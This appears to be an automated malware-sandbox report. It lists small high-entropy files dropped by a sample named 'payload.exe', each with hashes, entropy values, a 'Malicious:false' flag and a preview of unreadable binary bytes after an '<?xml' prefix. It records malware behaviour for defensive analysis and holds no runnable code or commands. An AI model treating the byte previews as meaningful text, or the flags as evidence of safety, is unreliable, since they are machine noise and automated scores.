                                                                                                Preview:<?xml"<..*. ?.4H.xP.L.A\'7..(...'.KY.%..C..@I...+jSeoN....5....f.$.+99W./..E....l......&-d(.$1r.~..oD..L?2#r.".ZA....R...........).a.v....u....#43'......n..8....n.RpmS%..I...2..5.]...`..Z.I.2....`U.(8.8..o../>esU.o.<...$...W..e4. .C...f.]8h.....=.u.!.l{=.......O.i-.`v..lE.z_y.B.F]A.M3~G.Q.8.R.rt.......,$c.K.Bu;4..e..~.F.@9.:.B..5..f..L.l..3j.?4..I.I....1....T....4..P.....#.......w~.(.T......}.2&L..9....I.e..=F..".....U..Ie._... .>&..Bl)...e..Kw.e[n^`..C.....0}...B.......6..^.._..b>.m..f.b..-J.P._..5j..z..R .7W.....q..w......b3..@..d..N.{n...........6.U..._K..c9...<..F.D...aP+..W.|.D.;X..tGm.Vp.n..J..C7....o..;n...V\.{./e`.*:.M.b...~......^..vl!..X..L;U...C@..+...H.2......:...... 9#x.I.S..Fb.v.....-XEOi.1xZ.....b@g.d....X.c...[.J..(.4.KT......M#..7VQ....'?{...V'.Y..c:.`.k.J.........&..?^.U....m$....[.;j...9:.....us....,..O....:Z...s............JFw...R..B.[...}P.n......^j...F..T..Ym..3.._..W...H..9......B .....{E~.4...9.}M.\.`:.>
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1711
                                                                                                Entropy (8bit):7.881264200945146
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:1DtCIKBRtiwKnamn2HPPRgcZsNaGQpGDoX+h8u7nuP7RipzlJP81ZIXMx3bD:5IBfiFamnwRgcaSGDoX7RTRitEPIILD
                                                                                                MD5:9744242EBFB374FFBA4121C1E23924E1
                                                                                                SHA1:6514AA5ED1531283AA0368DB20C76986428DDE0E
                                                                                                SHA-256:8602A37604F4B0238A86D02249990B9CFDF6A4FC06F6D04D9591E98DD13FD631
                                                                                                SHA-512:FE246954DFA778E9B05DEDC7245F855C84B3096B8C7BB76B0422CA340F3F0E25A4D2BF92DC86388CDBCB0E45344917E450FF2CE19105FDFF3999CA8650B027F5
                                                                                                Malicious:false
                                                                                                Preview:<?xmlh..Wg...5..a.6..m...e....r)...$71....Z.Vc...6(K;..]....4`$l.X...!..t...#.v=..x*.l$.....",a7r.u.9.=IX".9...;..uB...B....eK...........;=|d..e.#O.>..5..0.....97O..*Z).^.n..v,..~...D.g.=.6.}....^r..;.^.GU...m.U[;....X&..$...t..U.Jz.on...L.r.I.1.Y..Z.F..9..W. .. .g..y<.3....\.7z..@&o. `....l....)....n)<>..ik..S...!..M^.dP.s.#`2K....d...... ..4....4aD%&..H...:.H>...e@2.XDh.W*(P.....&.-..s..c........P.-Cn.XT.QR..M.....R.$f..3...u3(.......}.x.t..z.,..?Qr.Z7.I..jn!...."..8..}HpY......o.J>.0..)..OQ.9..C........._;E.-.(....~.U. 5.5..FQ.L...9Y8.P....hJ...I.W.Q."...0U.7[S....*.....CM.m.....ol.X..o.`...v.v..../...b....X.....N25`.................@=..4......F.Z..d.G..Y..P.-.<w.1..v....Q..&p&.J.D..,.......>.....{*.K].zUx.<.G....[...-..;U.x.KlC..S.m.`e.d?.......?....F..iR3B=..ay.K.7}....2%&a...#.....+.i.1pJ..E&|...b..1...6M...Du..?..C....6......$\d...u...\........^..v..1K..Q.Y.':....l..J.k......U.G...j.?..N.1....M0.rc=`...Z.v.a\M..k.6.s..U.]x.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1748
                                                                                                Entropy (8bit):7.882199298946955
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:+nuiVby3cuQiuUsyAVjHqoM4uBiivuLPFSCUGdRoeLE22ISMLD:+nWc5iuUW9rMXXWLdGAzLbSI
                                                                                                MD5:FD8556D8CDB3C9F302252FA28860B7C4
                                                                                                SHA1:C35DB1F0EB1F5304192836C448191CEC242E6CF8
                                                                                                SHA-256:694A434241798FCB1721E068D45186D7140CC67CBD3209E81C057C2CB0216774
                                                                                                SHA-512:E6E363037D3793C190A5528359CF6AD145A8739B1E7ADA8F8F5430868671239CAD3F0C853D74F6410589045304C7C82BC487E3B19630519350304C4BE1477503
                                                                                                Malicious:false
                                                                                                Preview:<?xmla..M..!)....Or.P.m...W.b................r.o.!"cMxF....k[...d.<y_8B.pT...... 62.`\nx.:.....s%".3.......r.cU.;.*R...e.#Z`}..IRy..z.....-..Q.\..Gq..R...T1.lw..wp...6kqK.?.o8.*...Z.5....q/..&.f..|..3........_`h..R...if`R...6....J.5*...Q.s 6....`.#..&..o.)...\..k..?gR.u0..=..Af6..,.^+....m4..C..8P.F..W2.j.3L.$.55....lW.. $.\ryI.y..../Jk>...7.3b...w..}..y.@..JA^........cw...s..*.ce..A.B..M.+Y.G...'...T.4...>.....L7.D.|<..?.b&......I..M./L/v...B.d..h..|.......[..Q.y..~l.I...O[.....Dr}X....+~....?6...aT.m..^e.0........u....z.C._sN.#.J......C..HH..t.<Ts.]...F..!.H.;I...rl..&.....E...K..2..fE.....-.P.x.(....S...J.C..U=:!..8.3[$.....iP...e..Lit.)ic...4..>$....s|8..@....s.{.......O..x{.......#...<R...c...0WK.].....o..9.,.....?...s.....H.$64..q\..I.eU;....".m.....4_\0..(}..3..4..>...G@5..H.S.tZl...a...#.........I...`.'.(.....1.K>.a..._t.9W...UXE.....3.,..b...i?...n...9.pF..w.....iD.~g.m...K...>(.S.P...y...N....z...N......=..3>.....3Y`.X...Kd.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1704
                                                                                                Entropy (8bit):7.876465220866108
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:jnm+AV3ICt6ylGArg8jUEh68wf8wlZJ6rkbVPswdjLD:DmvdCyMQgrffVJOVwdL
                                                                                                MD5:70017461AB23D3D280A88079C6EF6FAC
                                                                                                SHA1:995B61F29F9ED26B024E8FA0AA618E4C1CD96F54
                                                                                                SHA-256:F9E8906618642F86C806DF73B1E14624E06098017F91F58C68FB6D2B57EDB635
                                                                                                SHA-512:5E072BB09D792B730FF1CDC98013D4AE72518382B4CBE657237DAA969C870CE2F2CBE4D1CCD27C176B2B4BF134B893DF3656BA9146DCB45157029643B7A76B02
                                                                                                Malicious:false
                                                                                                Preview:<?xml......8.&......n.(.....O...#.8...N.....E..?P................3o$R...r. H.&)s.........GY..........".m.9...B...4.z}........g....9..IT..kK.p.l........x..._..3.B..=....-.P...C[.H.....uU.,/.*.P..s.l.xn..:x...Y.m..?.....m.'...g..Zp.[l.Lq.'..R.......(..u..{..{C..i...[ZD=(e./..)...9I.jF...P>..I.P......%.j....<...5..}V....{.......jk3TH.s..Y..X0^V#*s.Z$?..F...9.|..4....t'....e..U6. .>...pf..PK......t.e{_iq;.@...>.[>...C...$.....U.7... ...Y...d.`.....A..<ir0..a.ZW*....D/@..R......|c.YC.2S>.h^...(Y..&.%...}..i.#W.52.a.0.\...2..>..jS.PJ_.|.qk.....i......H. n. k.$..R2.;.........AR-qB..z)(..L;....>F..T..d..}K..X`pm.G....r.......A..Z.P......C/..Cn....wP6...H.k9...l..).v.;.......t.1A.M.A..mL.......6.B..lf4.Gl..b-.F.L.j[.....V./....=...uan........_L..........3.\../........H.p0...CN.d...f.I|t.];......4.~<.._?.c.SJ.j/bj,l..",.# .Tq.j.D.?<.>{..A}l..@^.........u..=8H..(.....X..A.1T..q.&.&.7.z.c.3b.`)...t.....P`.....iz.......k..K.@XC.X....\K.=..'..8..B
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1741
                                                                                                Entropy (8bit):7.900512571966182
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:5LA1ZiTBYr/yJJQizqMU87K/lzV+Qd68/q0t6nXhK2sMkAEslKLD:5LAQYr/yJCyq1flzJfqW6nJRkrslK
                                                                                                MD5:21305709E88038B04BB0607EB61CC6E5
                                                                                                SHA1:C79CFA0E204B732A04FB4AB8144E33081F330BAC
                                                                                                SHA-256:2C78231CC397182C93062A8EA6E82655583C168DCDC01A0C2908AFD1A517DCDF
                                                                                                SHA-512:EE911EFB096BAD27A0959494DD5D45E9650C3EC77BE9D6DD8754BCFEDE0E9415B36BCA380BCFE9B67AD1EEC690C9B61406111288DA1764EA6FEBC7D4F1DF791C
                                                                                                Malicious:false
                                                                                                Preview:<?xml.X.@.d.@( ..+..hq!...b.<.6..W..B.*b..j<...YFj..k..>.Gl~d..^..o........#..G.2.b...;j;........X..VQ...T.%T......'h....`d......g|...}...z....7.&..iW......5..\..v... "Z._..4.1<....%.i.g...}.dh... .K...W.......R^.a..o....JR......1.t..Um.V..b.b..^- .2.............6.e.......h...hM.!.6.?..Q...X..vd.s..........M./.Qi5Vn.e!.zKH...r\........Z<.1......o....^l.w..OD.b..g %-.S../..\...J..'..V3..I..9...K@...or.........<.9....D.n..*..K.....i<Z..._...{...s..6&*.zh..q.?%e....%+W.^..S.#.8.q.X.^.v*?Ek.kz.....;y9c.....Q...ow~Nx>.=B....5B.9...$.......q.H....."..K.U.p[.......`.\.....{..H.s...kR%..9....JJ..r1.F.R...j....w...o.%q~9.x.p.[..j.iy._...:e......L,..x....^..].d..-t.Z.|Q......_#...K.y.k.6.N.mv..D.z.#..?*.X.@_.~U....8B.........H.h.p>.D..m............<.NCt.]+..C..y)..#(...o.R.Y...W..)|n.N6Eq.S.......|DQAG.H...DT.'R...c.%......"F^.f.;.9>.N....}B...M..^.6....D^.b..QM.p.A...q..r..&.Y.B........%LR%['...{.@..,.....W..:.`...|&....1..h...w5.&..,p1..;.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1702
                                                                                                Entropy (8bit):7.875510381812435
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:+VqS5+PlKsL6jB0yRhRMb9v/Xy/vpTXbSUya9yeoBJXUSeK2OOuzOx3bD:+/ulFL6lnq9XyxS7L7Xhb5OuzCLD
                                                                                                MD5:A128EB7A7CA5FABC2D53128571E71BDC
                                                                                                SHA1:7C7F7E8780053E0A61C26EB4EF6B5B691D6C477D
                                                                                                SHA-256:9F4C151920D30CFC239697ABDF7A0E5882ADA3EB4E27A1DE6004FB6614B51E21
                                                                                                SHA-512:1D054F5FFCF7097C7093336D8071FCA3884B62EF3A1A66C0D204E8AFC4B5EC5C3EE1E619E897078E0C6CC58E7614629FD51CA098321EAAE1AE3C94022D153BAB
                                                                                                Malicious:false
                                                                                                Preview:<?xml.\n....q.EZ.....Z.'....FLD@/..3fd./l..S.,!..%,.......s.D..2.g..@.FD#.......C.L.a......z.c..K<n.(Kk.q.nk........_..F..+.......w..G.K..........{KRi....D.G=./u.&....2..ct..AP.J...U..o..I.O.R.L.Yk....t.?b..d..3.+......F.!..V8J.........".M....NQ..5.9_.9S...o5..9E...hka_...<..l.RG.....jJxa...^.EZ/.?......e......u..L.NX*..4..../$MTF`E.=...pdn..)%.....;.....N<.:._.<..... ...Y.u...=&6...70...i.......#.:.q...x.{...@j.5Y.`.a....L..;...l.^ls..H...nKr...8.8..Z*.`...y..m.F6......].X^E.h^..s<.....'+..5.{:,..=..*...f...........}...3 d...--|,.O...]8hZ..U'...d2..o9.\....'H.......i....e!A..].&.<....EPO.'..I]....=<.%$...&.l.......TK.............C...s`....'>G."^m..!IS...o..f..4..)Dm....yY..<..2d.1;W...e...w.c.......{Rv.._.TJ....4J.....mj..B...nH....Z...5.....".#.]<...|.|.m....!.E.~..E..W..@...rH.:o4.3id....4......TZ..#%q...."].`F.g.u.....P....#u.g..,._.&.u."..X.......\.a....U.(..O..:27.6A.T."....g..4.sLa....N.5.^.T.b_..'.......~$.eM...w2.....IJ.P.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1739
                                                                                                Entropy (8bit):7.887345750927621
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:3dOTdltLmq1q6Mr7a5kB/HYxwKUzCv+YoXo4TRwKLD:N8rmqAaMfxKLv+YolqK
                                                                                                MD5:1BCA5DEA8E1AF557A4E0DBA93377C2AF
                                                                                                SHA1:5452B92B3C571C1FCB6F85050757370369DE3159
                                                                                                SHA-256:4698AE9358E891DD078F297BFD21DE804CCB15A7EC1AFD3515F14226BFF98710
                                                                                                SHA-512:BB8E61FF5D29676E10671C2F4E6B2C79FA5BD259E35D0FAE22B90966BA661DD4B2755C348A91BB3CEB1E28A287F1D4F2E3F60C839FF16A7F0432432CEFA3AC82
                                                                                                Malicious:false
                                                                                                Preview:<?xml..6T.....:{...f.z...i...S...y.|...?.......BV.....U.R..0.$..H......{..Z.t]..M.....,.C....`....A.....:.",.d.|lx.#.... .....V..My.w4..O+....9.[.V...qF}!l".?....1...^..6%_.a.tg\.4.Z..P.?..0.1>MW...K.6r.J#......c.+..?..\...S..c@@...@I..X$....E.U.BM....i...........#.......*.w....)..i..8c>...?..Z..8.>.F.......mx.g..^6.='j.g.p.f.8~.\p...3^U..%.P_z;e.)..i..W......i...0\...*...^^.R..Y`.%...s.Nne...-...{...G.M..)..6{..p.R.@...e5p.F.J.^.O......X........8J...-....8...o..=.U`P.....f..x.....:.H%+.B.......n...m..B..j..Y.U.xT..*e..F..,..j...x}~'..O....:...GJ..u.....Y.O.......>.......Q........`4J.x~.DD..>...a*.......]`(.*v,V..a..O....QK....h@*..-....i..|..8...Fs.d..?< f.._..]_..m..j...kTLe .X<f...0..pv..U......F....u...\2...!.....{..D.l.iK...G..y..b.."..Y.&.bn.m....{.:.V...0.......\.....b/./.Z4c0.HU.fA..r4N.....v8y..!e.d........#.P[.ef..$.@(.w. .Z........q#.y...P./%56hJ....j6G....u...u.aba.n..4..cc..f&I.|.(..t..V./....E.%<.YF....4_Cj..E...^..=6~O...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1695
                                                                                                Entropy (8bit):7.864931333492718
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:Cjk0OvSHIRtglUYGbmJGx+8QwQn4boQzyNFHCqLD:TrXekl1QwQnGhz0Mq
                                                                                                MD5:F7F8D72ED073632F4B18355CE2C07F08
                                                                                                SHA1:B953669AA9577252E6DFB9AF3A447475862817BA
                                                                                                SHA-256:62271C610FA64CEA4C157470EFC1BAEABCADBE4ABAB4F38E6FD77ED917B821CB
                                                                                                SHA-512:80755DD67CE213861E7FDC854C50A7C698AE4FE6E5448076A77D48E30E2652FCBEE4CF1E9BB8B3689FB7C00016A47BFFB2FB584BB86DED7FB92C074E408AA5C8
                                                                                                Malicious:false
                                                                                                Preview:<?xmlU-E....`VB.....6O.A..X.Z......pPk....z......nL.b...+.p^.."...%..7.W......Y.4.Xx.....0n...2.G.D.........9~rQ.4*-..,7].a.wZSgNWow.....h...j....%[..8x.F.FkO ;<.-..QD+....70U..O...._e.C..Bh.k.....p2.n[..o0.$8x.4*.?.e#...qY......].U.S...U...|.....9d9Z.d.....Hi(!..42....U........^.0..&U..,AG..p...s.?c.....p.9.I.....&cy...:......Cu.a.pH.......[4e....O.6Q?......Hd(.......p.....B[....B+r..&......0..k........7. .....!xU..... .{....4i.B.K..E{.#..J..^...fa"".......~.`...4Cl..../..Na.I..@H..;sz.W..>.$.o.KHj.-...%fZ.}H./....J.J(o.F....DEU[..+.2..8..9d1o....Yx.7...(.C..P...D]..._{[.V..D.w@.O...._.m~..A>....h...0.....b....Z.1N.$...(t........<ERJAU......u.v....h..3NE.Kx.L'..{.....{.._e.f.Q.]..h.;......o.G...R....U...7.9q"....A..&..{...S.....|3C9.d=b.h..O.P.2..gGP.).].z.0,.H.\..z....}.69.~..4....{c.....T.O9.q...N9J.Cc&p.b..o*c...f..I..qp,...Q...9....L...?l...s..&...tn..........(...M..XgeO.p...|.....p%k.MD&....l....]0....^..3.#..8.........Z...}....`...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1732
                                                                                                Entropy (8bit):7.88426041218781
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:7uYwuPY+m9S1qJh6h2/sNz9dI9PwpOzUbLD:BP1iCqJkhfz9EP6dD
                                                                                                MD5:E3C868569970EAE0EE05FE285064FD93
                                                                                                SHA1:9610CCB1057D423AC34433E5397C99A076C11005
                                                                                                SHA-256:80899AECEEBC3E5D48FAA6A5FD2DD6A817AAEA4E6740816AFF5133D37220D8EE
                                                                                                SHA-512:DE13660429C909B3ABD9540E6010C31B492FF3370CFDF4B5EBB9215C63CB6C2F88B47DCA0AB357C9CCD85D38A676C229C5C2B81B7C6BFF0B1BEFC20B9155D2F5
                                                                                                Malicious:false
                                                                                                Preview:<?xml..,...kO...>p....b.?gy3..,..c.h..K.....k.1..8TNL..,.'^............fEU..?....!.st.1.a...e..fC....h.p]..;..c'....D.Z-......%.........2.&.A.'..X:".l8.....}.q.Y.N.x.TH...q}c./o..A.y.c7k*..?'.Gi.W.J..CMkw.....[.....H>.W*...v.zO.:zzb.j....EA..u..`!.1.O..n2..]I.Gv&~....FP.1BV=......!Q.z...c...Y....!.5.*...=7...[........_...L...V..J.....'.2M...d.._.......\0...blJ..uDA.:..o.0....zJ..Z....s...6..-...J.....J.P....s..O........S.F@......s.~...A.(P<.........).G.AE.Ef6]...t.c....a..'....We.....g.N^.7..V.-"..(7.KY.og..C....s.HI..x.g.!...Q.c:4.s..k.d.k.).....B...J...s}....Xo."2..\..w&}..qsj..]...$<..o]..S.~Cw...r.s.."Lh...d...IE..`......3v4..}.Y..:x.v.j.....l...r .ld.b..H(8..[._.8s.D..}..O.8.._.1.t.`V'..fa.....3..O".H.U.f...t.u.....h.{.......|...wci.4?.o.UymU.....gf^..>...k.K.L.......I........zL.Y........X+..Q..t.;.h..AD,.F.....[...dG.._-`.D......C>j...+z...VO.={.5a........K.(...k...?.^Ms....A.H.V.jy.n..H..X.)...9+@..<.$.4......0.....4"....Q..sJ..a...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1707
                                                                                                Entropy (8bit):7.875028063429582
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:oZIUwyY+F1epAIiLhPe/J3noJghHzi3kEBEpNohyH3sPysdutaAFgT6CPMB/IEkS:oaiqo8zYu/o6sPRu8FvMnkpihfLD
                                                                                                MD5:2E6DA2D84DB3D12977A34888AE7D844F
                                                                                                SHA1:C1903D10A4B4370CF8E3963195F1055760BAD00F
                                                                                                SHA-256:BBF5A2F7D5478151BFF79D56B23D4D839767C98E272BDDA620D86B42DFC3D2C7
                                                                                                SHA-512:4D5E6737F7E5AA34C19BF8A0FF974D31B9317632952DEBDD67035EDA8BE402AEEA4F40ECCDBEA0E1CAE96D591059B5A8B7E34114115633FFA2ECE759A5D92D0F
                                                                                                Malicious:false
                                                                                                Preview:<?xml)..Y.^.....=......z.R.Gh.....}.g.L(.G.........r..T.?.....%(C...I..7.x!/.x7.~..?f...jn'.:b.....z.'.@..R..avZC/......>.m.e....>..a............F1y.z....S.H.....a!..m.D.N.u.._...o|.%T....J..Ue.\..-S.Q1...&.;..G.B.j..t....\!S.....{..b...Wd."H.c.Z..n......1...G}..t....v9.].?.V..9.)3.#}.9.V.F...hcF....^........A*..`..;......n...b......-.5.il.T...k..A".-...u>.Jy..z.N...a"X..~t+.J...Zz.zM..g.8...=..7oF.o&.....9..........B->....a.....?A...-..L.].lvog4D...j.}e{.x..>6.)I_..S.eE....5...c.!1M...u_..I..B'....G._..eGb...okO..f.T%.G..W .G..8....hp_t.yP....!.>DS.m;.....^^p.R![tD...)....."......bW'*..1........OEU^[.*..l....._.7...V..O.9=...E.x..R....JR(X%..........*.K.....F.H.r*....I...#=.=\.7.u.5.S(.=..=.i.KXo..5...P..W.o..7{Y.o8..!i.qTC\.a4..V.8.}a2..G2....U...bk..}.......2{>..^..1..'QI..b.,...CcA4..!C.t.u...8.y../^y......6.4.et...l1.$.BR.oj..I.-8...1....Tq..9zT.!..#.....2d..~.zf..E..~.{H.GU....>q.....b.Oz$.."...?...ySV.T...-|}Z....+ .ZW.....@.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1744
                                                                                                Entropy (8bit):7.883058795974202
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:KZnQ/uM/5yTVCt3xQ7IsvgKa++JjN2Qq6zIq+inCzm/gLK6ULD:+nCuO52CtBQEll+C2GzYMCzm/gLKV
                                                                                                MD5:0537D638080DB2313C0695139537DF2D
                                                                                                SHA1:B1CDD9B561E3760FE586F41205CCE3F4D27DA1FB
                                                                                                SHA-256:9CD367707325ECE25618F05FD76EFD0F0E8176CFF1510BC2624ED7F8F510DB1B
                                                                                                SHA-512:44194760CA684A763F6CC7044FC2E4C31ED7BB5DE191F78039FD7397823A75EBFB036BF514658595828F96FE0842D44C08045FA5A915BEB304A2DE03D3866B1A
                                                                                                Malicious:false
                                                                                                Preview:<?xml.$@6.H...C8!.u..0.g..L......S...}b.-R....6r..... .x...A..p.....F6E..i1_b.....:<.|Bv.2F.i4...-.[..+.('.(.O...q]..c)0..[Z..v.N.&>.1A...{.i.k....t...7....Q$..w..s!.q.hT....y._+...........h..g..W.k.l.I....1.G.m-..2 ..=....XN.&a....gA..!9...5..t...dFk.?....&.~].o.^.!~.;.j$.....9i.*^...........e.AP....1#....x...O].V....."..~H.R..._.......+OOf^.[^'........E....U.x...|gM94..7..#oj.t4..m...LN.^..f........y..q..I.7.nir..dc..v......ua78...F....."..f......n.TH..`...av..x.).F.8..?..@......<l.l......z....oW....>..%.O..R........!<H..Ld.nz.]..ns8V<z+....t.....U8..l>.z.2P...z......J.......E`X..p..S%...p'....%.lK..Y.)...<.N5.:.F..%..G.?o.e....Q....R*. ....x..I3O.|...5.y......b..?K)..Y._..dcT....._.e.l.5=....=...0..<.w.A.~)..D...K...y..a....2.a8.......@|..a.:.J."...a.q0..*.l...I...+.f.n..s]...I..x.h-<..&Gl.=.U&Dw....^.3<f.#p.1`!~E.a....1.-..U..<.{.&2.#..o@..Bp.K.KF{..D.2h....C.<..e.......M.....D....o....V.w.....}...).zx*..k..V.....~.X.d>.a.%.(.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1697
                                                                                                Entropy (8bit):7.873311273498159
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:wjtUrbjEKbdSezWd9fo+XSXNmDIM+qd8rLD:wh2bjEKbkhPfo+CXNmQ
                                                                                                MD5:DF85AAB4CD15D819298A4E8900A4BCDC
                                                                                                SHA1:3B55AD7D2F49DDABC17BEA4297AB0CF7341B0547
                                                                                                SHA-256:5CC4ACBCC65CE39286E10DFC291271056B26041AF0E75E1A2B8D0250DC55CB33
                                                                                                SHA-512:31DF48FA01A5974197D22C505D658C60FEA0FF8834046BE7FD1EB6E98934A7779727F413E8BC9C63B124857F21594FF8539FE3DA6C691BB474357A5FF521C92D
                                                                                                Malicious:false
                                                                                                Preview:<?xmlM..Z85....qJ-.WZ....eHlc...(,....)(...o..2[....~..#..2..8..A.I..q..n."..l.2.:..w...o>..?...=.......c.;J.....^@..v.|.:.jp..w.ty.b_.Z..>s.Q...4Y+....|.......#H.`.n.R..X.....7..B.^....!....x.4\2..x.#.5&....u|..9.......*..[.f.@.....Z}l.+.m.r'".h..CR.F.uA......X...........0-..`.t(....+.<.q...-M...1l..!.F..w..^..bq..r.O.....:?.....B.wr.{.J.,..IK...hZo.....o.......;.]...\C....sr....g.].j...jYNA.Q.l...4.......i......]xg...&W.k#....P.....T.k.}s..Y...n.12X_11.=6.t.'d..K..*.G9.h>[B.xw.A..I.[..]6..Jm....u..<..5..4+..<O<(..y.....l...r........I|W....qq5j..P).:<..7.A3=.......e.n..!.?yg4;}...j-8.]T....U.NeD.."...Q...#-A.....}F 5_.$u........St....H..&......a.L/i..#.NF.~.Qj$..I.qF.?..[...c.....au[..ORf.*@J...V..8W.....Hl1$x....SOt.(.:#.5..;.s....A-..b.l.......x.QJ9.W../h...b..C..P.....}u.{.QB.fF..![..'$...kT1...)..+...N.X}d.0...h|n.W....G.!.b.#..:......|E.[....'.I.t.....ROe.TI..b..`..nQ=...6i..h_R.f}~$...5....].*.tW.[)..;'#....x+../y..:u.a.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1734
                                                                                                Entropy (8bit):7.866462186191917
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:q6eE9/lhGCAt5MUymmxBeXCXhqDF1b9Ue4d0UlLD:qNclh75xBe84HUR
                                                                                                MD5:8E8C44647ACE9583824AE184D3F8C3E9
                                                                                                SHA1:6ED3B6FBA27B665B91E336A21AAEC7D8FF0A1435
                                                                                                SHA-256:760F5587E6EC2963AC3674206C2AD047F3151A76F0163DF79983ADC182B32C56
                                                                                                SHA-512:39D0B5EDBCCDAD803B065225A05770FA2382CF1E5425D39B551F864D3008783613309FA2D2116A1A29E632FB0BC6828462D5453141FFC20400BC61BC9DFA5186
                                                                                                Malicious:false
                                                                                                Preview:<?xml...C.*....\.C....Ie.?.cx.QwD....c...3.F.....!.2..DO.IW..Z..C`......T}........W....<_.R......H9..q.4...`y........p..~e.....@....w.F.f...F.J9%j..l.F.o..FB..M........2...%.....8..}.S...{.....(..b.,..R:.L..\..^xr{7_e2........>./.x.....(c..9....?lc.........%..............#....H..&.V.d.A._S.D.y.9."!^v.:#H.8w-.<en..Y...MqT_.....s_.2....\.'{...:..;....a.ca...../._.R.C;9?...b....[..J.&...Y{..{+.@:M.?.Qj...!]#3.....IcY..N...$... 1R.......a]._......H."N.t.O.8X.o.z....+Y....#D....Y.[....}.<.hw..1y<8..r.....{`I.G.]F..o.7.Z.=Zm..C..F....%..q..$:.|.V4Kh^.\?..xj.X..!k**..5^.>.>....,..P.;.8i.f}...y..9.0.q.9*:....1.r..Q.sx...7...M.......>.1.s."..%.."..e_.:..un... _j<.o(.1..i~.R.Q.s.)Zh.S...._....BJ.LB..Vu(.6n.e.?.+q..=..).4..."......#....q.....h..{.f...q/...+ ...T...K5....8.....(.....}.e....6........,9(.Q....9Q....]..-...J.B......!Z.*...7.1.?t1..]E......A..9a.........7....HT..n.M+G.h....^..evwIt.l.<...A.....R.D....%H.V.R...>.*2.B.P.Y,(!g....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1689
                                                                                                Entropy (8bit):7.859423179399175
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:FCqJn+2hJa5pHDW2Sk3wfDOhQ/wPUGMSWQa9RWc6y2TjnJ0mES1uvjJkdBPJ5x3X:FXhJGWVPB5sr3nJYSoryBP5LD
                                                                                                MD5:FB6E65C510FFED146CD91240CFECC3BA
                                                                                                SHA1:BE8D394D8A4B389A4B4A6515F2F5BA315B0A8388
                                                                                                SHA-256:5506162964B01908B5CCE9D5E359871164DC967EA2A000E64BC4844510CAF6AF
                                                                                                SHA-512:5C85EEB855113D30DCF93FDBA22AD90301768B182B0C14E614389CFC9AB8AC142B49DEE7FCCEEB59D585C31F11EB06EF87853A030AD3513DE4F96A127425204E
                                                                                                Malicious:false
